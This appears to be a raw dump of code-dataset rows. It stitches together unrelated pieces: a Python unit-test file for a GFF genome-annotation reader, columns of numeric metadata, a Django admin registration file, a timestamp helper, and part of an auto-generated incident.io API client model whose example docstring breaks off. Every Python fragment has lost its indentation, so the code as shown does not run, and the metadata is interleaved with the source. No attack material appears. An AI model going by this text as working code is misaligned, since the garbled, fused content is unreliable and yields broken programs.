sample_text += "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RB\n"
return sample_text
# noinspection PyPep8
def get_out_of_order_text_with_missing_parent():
sample_text = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RB\n"
return sample_text
# noinspection PyPep8
def get_annotated_gff():
result = "Scaffold1\tI5K\tgene\t133721\t162851\t.\t-\t.\tID=AGLA000002;Name=AglaTmpM000002;\n"
result += "Scaffold1\tI5K\tmRNA\t133721\t162851\t.\t-\t.\tID=AGLA000002-RA;Name=AglaTmpM000002-RA;Parent=AGLA000002;Dbxref=PRINTS:PR00075;\n"
result += "Scaffold1\tI5K\texon\t133721\t135519\t.\t-\t.\tID=AGLA000002-RA-EXON01;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t140163\t140635\t.\t-\t.\tID=AGLA000002-RA-EXON02;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t147266\t147396\t.\t-\t.\tID=AGLA000002-RA-EXON03;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t152757\t152979\t.\t-\t.\tID=AGLA000002-RA-EXON04;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t162720\t162762\t.\t-\t.\tID=AGLA000002-RA-EXON05;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t162825\t162851\t.\t-\t.\tID=AGLA000002-RA-EXON06;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t140426\t140635\t.\t-\t0\tID=AGLA000002-RA-CDS01;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t147266\t147396\t.\t-\t2\tID=AGLA000002-RA-CDS02;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t152757\t152976\t.\t-\t0\tID=AGLA000002-RA-CDS03;Parent=AGLA000002-RA;\n"
return result
# noinspection PyPep8
def get_annotated_gff_multi_dbxref():
result = "Scaffold1\tI5K\tgene\t133721\t162851\t.\t-\t.\tID=AGLA000002;Name=AglaTmpM000002;\n"
result += "Scaffold1\tI5K\tmRNA\t133721\t162851\t.\t-\t.\tID=AGLA000002-RA;Name=AglaTmpM000002-RA;Parent=AGLA000002;Dbxref=PRINTS:PR00075,PFAM:foo;\n"
result += "Scaffold1\tI5K\texon\t133721\t135519\t.\t-\t.\tID=AGLA000002-RA-EXON01;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t140163\t140635\t.\t-\t.\tID=AGLA000002-RA-EXON02;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t147266\t147396\t.\t-\t.\tID=AGLA000002-RA-EXON03;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t152757\t152979\t.\t-\t.\tID=AGLA000002-RA-EXON04;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t162720\t162762\t.\t-\t.\tID=AGLA000002-RA-EXON05;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t162825\t162851\t.\t-\t.\tID=AGLA000002-RA-EXON06;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t140426\t140635\t.\t-\t0\tID=AGLA000002-RA-CDS01;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t147266\t147396\t.\t-\t2\tID=AGLA000002-RA-CDS02;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t152757\t152976\t.\t-\t0\tID=AGLA000002-RA-CDS03;Parent=AGLA000002-RA;\n"
return result
# noinspection PyPep8
def get_annotated_gff_multi_dbxref_repeated_anno():
result = "Scaffold1\tI5K\tgene\t133721\t162851\t.\t-\t.\tID=AGLA000002;Name=AglaTmpM000002;\n"
result += "Scaffold1\tI5K\tmRNA\t133721\t162851\t.\t-\t.\tID=AGLA000002-RA;Name=AglaTmpM000002-RA;Parent=AGLA000002;Dbxref=PRINTS:PR00075;Dbxref=PFAM:foo;\n"
result += "Scaffold1\tI5K\texon\t133721\t135519\t.\t-\t.\tID=AGLA000002-RA-EXON01;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t140163\t140635\t.\t-\t.\tID=AGLA000002-RA-EXON02;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t147266\t147396\t.\t-\t.\tID=AGLA000002-RA-EXON03;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t152757\t152979\t.\t-\t.\tID=AGLA000002-RA-EXON04;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t162720\t162762\t.\t-\t.\tID=AGLA000002-RA-EXON05;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\texon\t162825\t162851\t.\t-\t.\tID=AGLA000002-RA-EXON06;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t140426\t140635\t.\t-\t0\tID=AGLA000002-RA-CDS01;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t147266\t147396\t.\t-\t2\tID=AGLA000002-RA-CDS02;Parent=AGLA000002-RA;\n"
result += "Scaffold1\tI5K\tCDS\t152757\t152976\t.\t-\t0\tID=AGLA000002-RA-CDS03;Parent=AGLA000002-RA;\n"
return result
class TestGFFReader(unittest.TestCase):
def setUp(self):
self.reader = GFFReader()
def tearDown(self):
# Remove extra files created by GFFReader
try:
os.remove("genome.comments.gff")
os.remove("genome.invalid.gff")
os.remove("genome.ignored.gff")
except OSError:
pass
def test_validate_line_not_enough_fields(self):
badline = "scaffold00080\tmaker\tgene\t106151\t109853\t+\t.\tID=BDOR_007864\n"
self.assertFalse(self.reader.validate_line(badline))
def test_validate_line_no_id(self):
badline = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tName=BDOR_007864\n"
self.assertFalse(self.reader.validate_line(badline))
def test_validate_line_indices_out_of_order(self):
badline = "scaffold00080\tmaker\tgene\t109853\t106151\t.\t+\t.\tID=BDOR_007864;Name=BDOR_007864\n"
self.assertFalse(self.reader.validate_line(badline))
def test_validate_line(self):
goodline = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n"
self.assertTrue(self.reader.validate_line(goodline))
def test_line_type_gene(self):
line = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n".split('\t')
self.assertEqual('gene', self.reader.line_type(line))
def test_line_type_mrna(self):
line = "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n".split('\t')
self.assertEqual('mRNA', self.reader.line_type(line))
# noinspection PyPep8
def test_line_type_exon(self):
line = "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n".split('\t')
self.assertEqual('exon', self.reader.line_type(line))
# noinspection PyPep8
def test_line_type_cds(self):
line = "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n".split('\t')
self.assertEqual('CDS', self.reader.line_type(line))
# noinspection PyPep8
def test_line_type_start_codon(self):
line = "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n".split('\t')
self.assertEqual('start_codon', self.reader.line_type(line))
# noinspection PyPep8
def test_line_type_stop_codon(self):
line = "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n".split('\t')
self.assertEqual('stop_codon', self.reader.line_type(line))
def test_parse_attributes(self):
attr = "ID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n"
parsed = self.reader.parse_attributes(attr)
self.assertEqual('BDOR_007864-RA:stop2', parsed['identifier'])
self.assertEqual('BDOR_007864-RA', parsed['parent_id'])
def test_parse_attributes_with_name(self):
attr = "ID=BDOR_007864-RA:stop2;Name=BDOR_007864-RA;Parent=BDOR_007864-RA\n"
parsed = self.reader.parse_attributes(attr)
self.assertEqual('BDOR_007864-RA:stop2', parsed['identifier'])
self.assertEqual('BDOR_007864-RA', parsed['parent_id'])
self.assertEqual('BDOR_007864-RA', parsed['name'])
# noinspection PyPep8
def test_extract_cds_args(self):
line = "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n".split('\t')
args = self.reader.extract_cds_args(line)
expected = {'indices': [106151, 106451], 'strand': '+', 'phase': 0, 'identifier': 'BDOR_007864-RA:cds:0', 'parent_id': 'BDOR_007864-RA'}
self.assertEqual(expected, args)
# noinspection PyPep8
def test_extract_exon_args(self):
line = "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n".split('\t')
expected = {'indices': [106151, 106451], 'score': 0.9, 'strand': '+', 'identifier': 'BDOR_007864-RA:exon:0', 'parent_id': 'BDOR_007864-RA'}
args = self.reader.extract_exon_args(line)
self.assertEqual(expected, args)
# noinspection PyPep8
def test_extract_mrna_args(self):
line = "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n".split('\t')
expected = {'indices': [106151, 109853], 'identifier': 'BDOR_007864-RA', 'strand': '+', 'parent_id': 'BDOR_007864',
'seq_name': "scaffold00080", 'source': "maker"}
args = self.reader.extract_mrna_args(line)
self.assertEqual(expected, args)
def test_extract_gene_args(self):
line = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n".split('\t')
expected = {'seq_name': 'scaffold00080', 'source': 'maker', 'indices': [106151, 109853],
'strand': '+', 'identifier': 'BDOR_007864'}
args = self.reader.extract_gene_args(line)
self.assertEqual(expected, args)
# noinspection PyPep8
def test_extract_other_feature_args(self):
line = "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n".split('\t')
expected = {'feature_type': 'start_codon', 'indices': [106151, 106153],
'identifier': 'BDOR_007864-RA:start1', 'parent_id': 'BDOR_007864-RA'}
args = self.reader.extract_other_feature_args(line)
self.assertEqual(expected, args)
# noinspection PyPep8
def test_update_cds(self):
current_cds = Mock()
line = "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n".split('\t')
self.reader.update_cds(line, current_cds)
current_cds.add_indices.assert_called_with([106509, 106749])
current_cds.add_phase.assert_called_with(2)
current_cds.add_identifier.assert_called_with('BDOR_007864-RA:cds:1')
# noinspection PyPep8
def test_update_exon(self):
current_exon = Mock()
line = "scaffold00080\tmaker\texon\t106509\t106749\t8.34\t+\t2\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n".split('\t')
self.reader.update_exon(line, current_exon)
current_exon.add_indices.assert_called_with([106509, 106749])
current_exon.add_identifier.assert_called_with('BDOR_007864-RA:exon:1')
def test_read_file(self):
text = get_sample_text()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertEquals(2, len(genes))
self.assertEquals('BDOR_007864-RA', genes[0].mrnas[0].identifier)
self.assertEquals([179489, 179691], genes[1].mrnas[0].cds.indices[2])
def test_read_file_out_of_order(self):
text = get_out_of_order_text()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertEqual(1, len(genes))
self.assertEqual('BDOR_007864-RA', genes[0].mrnas[0].identifier)
self.assertEqual(2, len(genes[0].mrnas))
self.assertEqual(2, len(genes[0].mrnas[0].exon.indices))
self.assertEqual(2, len(genes[0].mrnas[1].exon.indices))
def test_read_file_doesnt_loop_infinitely_when_feature_with_no_parent_mrna(self):
text = get_out_of_order_text_with_missing_parent()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertEqual(1, len(genes))
def test_read_file_annotated(self):
text = get_annotated_gff()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertEquals(1, len(genes))
self.assertEquals({"Dbxref": ["PRINTS:PR00075"]}, genes[0].mrnas[0].annotations)
def test_read_file_annotated_multi_dbxref(self):
text = get_annotated_gff_multi_dbxref()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertEquals(1, len(genes))
self.assertEquals({"Dbxref": ["PRINTS:PR00075", "PFAM:foo"]}, genes[0].mrnas[0].annotations)
def test_read_file_annotated_multi_dbxref_repeated_anno(self):
text = get_annotated_gff_multi_dbxref_repeated_anno()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertEquals(1, len(genes))
self.assertEquals({"Dbxref": ["PRINTS:PR00075", "PFAM:foo"]}, genes[0].mrnas[0].annotations)
def test_CDS_knows_its_strand(self):
text = get_annotated_gff()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertTrue(genes[0].mrnas[0].cds)
self.assertEquals('-', genes[0].mrnas[0].cds.strand)
def test_exon_knows_its_strand(self):
text = get_annotated_gff()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertTrue(genes[0].mrnas[0].exon)
self.assertEquals('-', genes[0].mrnas[0].exon.strand)
def test_mrna_knows_its_strand(self):
text = get_annotated_gff()
inbuff = io.BytesIO(text)
genes, comments, invalids, ignored = self.reader.read_file(inbuff)
self.assertTrue(genes[0].mrnas[0])
self.assertEquals('-', genes[0].mrnas[0].strand)
def test_delete_name_if_name_and_id_are_equivalent(self):
attr = "ID=BDOR_007864;Name=BDOR_007864\n"
parsed = self.reader.parse_attributes(attr)
self.assertEqual('BDOR_007864', parsed['identifier'])
self.assertTrue('name' not in parsed)
def suite():
_suite = unittest.TestSuite()
_suite.addTest(unittest.makeSuite(TestGFFReader))
return _suite
if __name__ == '__main__':
unittest.main()
| 61.713855
| 161
| 0.719606
| 3,026
| 20,489
| 4.711831
| 0.07766
| 0.022303
| 0.07743
| 0.024407
| 0.874386
| 0.849278
| 0.825572
| 0.786155
| 0.75789
| 0.728433
| 0
| 0.184416
| 0.118698
| 20,489
| 331
| 162
| 61.900302
| 0.605195
| 0.019181
| 0
| 0.482759
| 0
| 0.386973
| 0.536285
| 0.499178
| 0
| 0
| 0
| 0
| 0.183908
| 1
| 0.145594
| false
| 0.003831
| 0.019157
| 0
| 0.195402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba13c09da7e295bf670c694305cf94d404d55d81
| 162
|
py
|
Python
|
checkin/checkin/admin.py
|
peitaosu/100CheckIn
|
1251252e635f01435090bfe34669d52d7a40ffd6
|
[
"MIT"
] | null | null | null |
checkin/checkin/admin.py
|
peitaosu/100CheckIn
|
1251252e635f01435090bfe34669d52d7a40ffd6
|
[
"MIT"
] | null | null | null |
checkin/checkin/admin.py
|
peitaosu/100CheckIn
|
1251252e635f01435090bfe34669d52d7a40ffd6
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import User, Event, User_Event
admin.site.register(User)
admin.site.register(Event)
admin.site.register(User_Event)
| 27
| 43
| 0.820988
| 25
| 162
| 5.24
| 0.4
| 0.206107
| 0.389313
| 0.335878
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080247
| 162
| 6
| 44
| 27
| 0.879195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ba171f8a8ed2e349bc0a827d827d4133b12f654f
| 142
|
py
|
Python
|
app/utils.py
|
NoSugarCoffee/D-C
|
d8c675dac8459ae86a146d95ea6eb23bd8e7920d
|
[
"MIT"
] | null | null | null |
app/utils.py
|
NoSugarCoffee/D-C
|
d8c675dac8459ae86a146d95ea6eb23bd8e7920d
|
[
"MIT"
] | 5
|
2022-01-31T14:52:16.000Z
|
2022-02-19T16:35:14.000Z
|
app/utils.py
|
NoSugarCoffee/sweet_backend
|
d8c675dac8459ae86a146d95ea6eb23bd8e7920d
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timezone, timedelta
def get_current_timestamp_CST():
return datetime.now(tz=timezone(timedelta(hours=8)))
| 28.4
| 56
| 0.795775
| 19
| 142
| 5.789474
| 0.789474
| 0.309091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.105634
| 142
| 5
| 56
| 28.4
| 0.858268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
e83f07c3bad83830a78753a50a8813c75ed87df7
| 40,583
|
py
|
Python
|
incident_io_client/models/incidents_list_response_body.py
|
expobrain/python-incidentio-client
|
be15e0370dc3feb979e448f87b40906d12331467
|
[
"MIT"
] | null | null | null |
incident_io_client/models/incidents_list_response_body.py
|
expobrain/python-incidentio-client
|
be15e0370dc3feb979e448f87b40906d12331467
|
[
"MIT"
] | null | null | null |
incident_io_client/models/incidents_list_response_body.py
|
expobrain/python-incidentio-client
|
be15e0370dc3feb979e448f87b40906d12331467
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.incident_response_body import IncidentResponseBody
from ..models.pagination_meta_response_body import PaginationMetaResponseBody
from ..types import UNSET, Unset
T = TypeVar("T", bound="IncidentsListResponseBody")
@attr.s(auto_attribs=True)
class IncidentsListResponseBody:
"""
Example:
{'incidents': [{'call_url': 'https://zoom.us/foo', 'created_at': '2021-08-17T13:28:57.801578Z', 'creator':
{'api_key': {'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'My test API key'}, 'user': {'email':
'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}},
'custom_field_entries': [{'custom_field': {'description': 'Which team is impacted by this issue', 'field_type':
'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options': [{'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456',
'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}, {'custom_field': {'description': 'Which team is impacted by this issue', 'field_type':
'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options': [{'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456',
'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}], 'id': '01FDAG4SAP5TYPT98WGR2N7W91', 'incident_role_assignments': [{'assignee': {'email':
'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role':
{'created_at': '2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident',
'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}, {'assignee': {'email': 'lisa@incident.io', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role': {'created_at':
'2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}], 'mode': 'real', 'name': 'Our database is sad', 'permalink':
'Impedit delectus accusamus ea eos.', 'postmortem_document_url': 'https://docs.google.com/my_doc_id',
'reference': 'INC-123', 'severity': {'created_at': '2021-08-17T13:28:57.801578Z', 'description': "It's not
really that bad, everyone chill", 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Minor', 'rank': 1, 'updated_at':
'2021-08-17T13:28:57.801578Z'}, 'slack_channel_id': 'C02AW36C1M5', 'slack_channel_name': 'inc-165-green-parrot',
'status': 'triage', 'summary': "Our database is really really sad, and we don't know why yet.", 'timestamps':
[{'last_occurred_at': '2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at':
'2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at': '2021-08-17T13:28:57.801578Z',
'name': 'last_activity'}], 'type': 'Doloremque sit dolor et libero non eos.', 'updated_at':
'2021-08-17T13:28:57.801578Z', 'visibility': 'public'}, {'call_url': 'https://zoom.us/foo', 'created_at':
'2021-08-17T13:28:57.801578Z', 'creator': {'api_key': {'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'My test API
key'}, 'user': {'email': 'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis',
'role': 'viewer'}}, 'custom_field_entries': [{'custom_field': {'description': 'Which team is impacted by this
issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options':
[{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
